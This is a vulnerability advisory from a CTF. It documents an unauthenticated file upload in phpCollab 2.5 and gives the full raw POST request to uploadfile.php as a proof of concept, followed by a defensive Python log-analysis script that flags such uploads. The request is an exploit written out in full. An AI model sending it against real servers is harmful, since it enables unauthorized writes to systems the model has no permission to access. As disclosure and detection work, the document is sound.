PHPCollab version 2.5 suffers from an unauthenticated file upload vulnerability.
# Exploit Title: phpcollab upload files without any authentication
# Date: 3/5/2012
# Author: team ' and 1=1--
# Software Link: http://www.phpcollab.com/
# Version: 2.5
# Vulnerability was found during the AthCon IT Security Conference CTF
# CTF Organizer: echothrust
During the AthCon CTF, the team ' and 1=1-- discovered that phpcollab allows a malicious user to upload files to the system without any authentication by sending the following POST request:
POST /phpcollab/projects_site/uploadfile.php?PHPSESSID=f2bb0a2008d0791d1ac45a8a38e51ed2&action=add&project=&task= HTTP/1.1
Host: 192.0.0.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: PHPSESSID=6cvltmkam146ncp3hfbucumfk6
Referer: http://192.0.0.2/
Content-Type: multipart/form-data; boundary=---------------------------19548990971636807826563613512
Content-Length: 29914

-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000000
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="maxCustom"

-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="commentsField"

Hello there
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="upload"; filename="filename.jpg"
Content-Type: image/jpeg

[file data stripped]
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="submit"

Save
-----------------------------19548990971636807826563613512--
As an example, we uploaded the following image to the web server:
http://192.0.0.2/phpcollab/files/1--stallowned.jpg
Note that the application does reject uploads of php files, by checking the filename extension.
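The request above has three traits a defender can look for in web server logs: a POST to uploadfile.php with action=add from a client that never logged in, a PHPSESSID carried in the query string rather than only in the cookie, and empty project/task parameters. The script below is an added example written for this page, not code from the advisory or from phpCollab; it parses Apache combined-format access log lines (constructed samples embedded inline) and flags uploads that show any of those traits. The login path used to mark a client as authenticated is an assumed placeholder, since the page does not name phpCollab's login endpoint.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format; they are not from the advisory.
# The session id and the .jpg name mirror the advisory's request; the client IPs are made up.
SAMPLE_LOG = """\
192.0.0.9 - - [05/Mar/2012:10:00:01 +0000] "POST /phpcollab/general/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.0.9 - - [05/Mar/2012:10:00:05 +0000] "POST /phpcollab/projects_site/uploadfile.php?action=add&project=1&task=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.0.77 - - [05/Mar/2012:10:02:11 +0000] "POST /phpcollab/projects_site/uploadfile.php?PHPSESSID=f2bb0a2008d0791d1ac45a8a38e51ed2&action=add&project=&task= HTTP/1.1" 200 512 "http://192.0.0.2/" "Mozilla/5.0"
192.0.0.77 - - [05/Mar/2012:10:02:12 +0000] "GET /phpcollab/files/1--stallowned.jpg HTTP/1.1" 200 29000 "-" "Mozilla/5.0"
"""

# Assumed login endpoint (placeholder): the advisory does not state phpCollab's real login path.
LOGIN_PATH = "/phpcollab/general/login.php"
UPLOAD_SCRIPT = "uploadfile.php"

# Apache combined log format: ip ident user [ts] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so that "project=&task=" still yields the keys with "" values
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def find_suspicious_uploads(log_text, login_path=LOGIN_PATH):
    """Flag uploadfile.php?action=add POSTs that look unauthenticated or malformed.

    Lines are processed in order, so a login that precedes the upload from the
    same client IP counts as a prior authentication (a coarse but useful heuristic).
    """
    logged_in = set()
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"] == login_path and rec["status"] in (200, 302):
            logged_in.add(rec["ip"])
            continue
        if not rec["path"].endswith("/" + UPLOAD_SCRIPT):
            continue
        q = rec["query"]
        if q.get("action", [""])[0] != "add":
            continue
        reasons = []
        if rec["ip"] not in logged_in:
            reasons.append("no prior successful login from this IP")
        if "PHPSESSID" in q:
            reasons.append("session id passed in query string")
        if not q.get("project", [""])[0] or not q.get("task", [""])[0]:
            reasons.append("upload without project/task context")
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "target": rec["target"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_suspicious_uploads(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["target"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

On the constructed sample the upload from 192.0.0.9 passes (it follows a login and names a project and task), while the one from 192.0.0.77, which reproduces the advisory's request shape, is flagged on all three counts. The IP-based login correlation is deliberately coarse; on a real deployment the upload handler itself should refuse the request when no authenticated session exists, and the log check is only a way to find requests that slipped past it.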